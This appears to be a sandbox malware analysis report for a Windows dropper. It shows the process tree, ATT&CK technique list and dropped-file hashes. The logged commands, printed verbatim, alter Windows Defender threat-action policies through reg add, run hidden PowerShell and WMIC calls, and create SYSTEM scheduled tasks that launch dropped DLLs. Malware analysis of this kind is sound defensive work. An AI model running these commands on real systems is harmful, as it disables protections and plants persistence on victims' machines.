  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:7096
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6956
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5344
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:984
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:6584
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:6932
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5216
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5860
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5200
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:6972
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:6980
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5848
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5132
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5540
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:1704
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:396
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:3596
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:6476
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:7044
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6932
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:5664
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7164
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:6276
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:5048
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:356
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:6616
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\YABzst.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5244
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5132
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\CpQjtVX.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6428
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:4972
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:4452
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7052
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\PdJoQla.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4716
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6356
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\HWSKoIc.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:32
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6652
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\pssCrHw.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:500
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1700
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\rAGznef.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2280
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 00:00:35 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\tAxIaZpw\lYPEudG.dll\",#1 /IAUddidPKR 385118" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:6152
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "rrqYunoktxOQmCoCX"
  2⤵
  PID:6440
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6052
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
  2⤵
  PID:3596

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\Oyazleo.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\Oyazleo.exe GH /PgmYdidhW 385118 /S
1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
PID:2760
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:6068
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5792
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:4716
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5756
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:6492
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:6004
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:2336
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5636
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5768
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4212
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:6784
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5316
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5420
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:6740
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:7080
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2812
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:4572
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:6728
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:6732
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:6676
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:1876
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:5592
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:7036
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5756
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\GINQSa.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5876
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5212
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\DyQSDDl.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6448
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:5752
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3728
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:5096
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:356
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\BlkSZqS.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2736
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5300
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\SSgpkZI.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:708
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\BsSCsFL.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5328
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\FNDTiYc.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5448
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6336
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
  2⤵
  PID:6092

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\tAxIaZpw\lYPEudG.dll",#1 /IAUddidPKR 385118
1⤵
PID:6300
- C:\Windows\SysWOW64\rundll32.exe
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\tAxIaZpw\lYPEudG.dll",#1 /IAUddidPKR 385118
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Drops file in System32 directory
  - Enumerates system info in registry
  PID:6436
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"
    3⤵
    PID:6620
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5232

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4012

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6348

C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
1⤵
PID:6324

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:6104

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2012

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2744

C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
1⤵
PID:988

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:7100

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
PID:2812

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
PID:6340

C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
1⤵
PID:5808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GameSyncLink\GameService.exe

Filesize
288KB

MD5
d9ec6f3a3b2ac7cd5eef07bd86e3efbc

SHA1
e1908caab6f938404af85a7df0f80f877a4d9ee6

SHA256
472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

SHA512
1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

Download Submit
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe

Filesize
2.5MB

MD5
e6943a08bb91fc3086394c7314be367d

SHA1
451d2e171f906fa6c43f8b901cd41b0283d1fa40

SHA256
aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

SHA512
505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

Download Submit
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe

Filesize
6.2MB

MD5
1bacbebf6b237c75dbe5610d2d9e1812

SHA1
3ca5768a9cf04a2c8e157d91d4a1b118668f5cf1

SHA256
c3747b167c70fd52b16fb93a4f815e7a4ee27cf67d2c7d55ea9d1edc7969c67d

SHA512
f6438eced6915890d5d15d853c3ad6856de949b7354dcea97b1cf40d0c8aed767c8e45730e64ab0368f3606da5e95fd1d4db9cc21e613d517f37ddebbd0fa1fe

Download Submit
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe

Filesize
13.2MB

MD5
72b396a9053dff4d804e07ee1597d5e3

SHA1
5ec4fefa66771613433c17c11545c6161e1552d5

SHA256
d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

SHA512
ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

Download Submit
C:\Program Files (x86)\GameSyncLink\installg.bat

Filesize
284B

MD5
5dee3cbf941c5dbe36b54690b2a3c240

SHA1
82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

SHA256
98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

SHA512
9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
2.0MB

MD5
1dd2fdd8448e079c8d669f84c0485d0f

SHA1
34b07b243db0c388fada5137d73cfe52609826f7

SHA256
355afb47c2e501d950e9da62f52408715c7deb4adf72c8dca3460428d3d6e23f

SHA512
bb8f821b4f62ab923a6e1e83d5c3ebb67119bcef94b335ff8a29d42e59daabac025389e47c2a8c0150854d0ee2bd0c9d2b2160fb4916a0e4e71daabdd14b1932

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\EGIDAFBA

Filesize
92KB

MD5
3daad470df391b2f80f1355a73f49b47

SHA1
fd3d71f1d5bcca2c56518cdb061fc1e0a2465dec

SHA256
a0732dc29331aee2809c08b9dd1bbddcfd6badc2b90a932b1e5c220d573e7b08

SHA512
a03c5c17710c1ecafebca8b3066db41e1d682a619162da61d12f7f84c8ead35b49b6f390a473e23c41baff6072ffc6000a52345d5a1f73371b8711f470216b6a

Download Submit
C:\ProgramData\EHIDAKECFIEBGDHJEBKK

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\ProgramData\FIIEGDBAEBFIIDHJJJEBAAAKJE

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\ProgramData\KJKFBAFIDAEBFHJKJEBFCBFHDA

Filesize
5.0MB

MD5
66be47b9332591d12c78016dfc077db5

SHA1
a8bc3e9c304f384eb731db1c6c8880dfe0af27c9

SHA256
bc3767745aa8dbe9e3f1dc089f93f31af57b9d333ee8e693c5401b6da305af54

SHA512
20b28ef718f8342e052f083f7c449094c61629f8d7786d6f9ade7c30085d8cf5e12cef5962bc12094c102d37993b173e2834df7ef823e44d1d5a58ab89338029

Download Submit
C:\ProgramData\SelectExpand.txt

Filesize
1.1MB

MD5
309925c1c7fe8d06ebd617adcce2a4fd

SHA1
fb727db616277992d5bc39fc0cf93db3dff8b157

SHA256
53c10d56dbc4d10aa6425d1637182290eb3ee9975dba90ad85a9374fe9575e33

SHA512
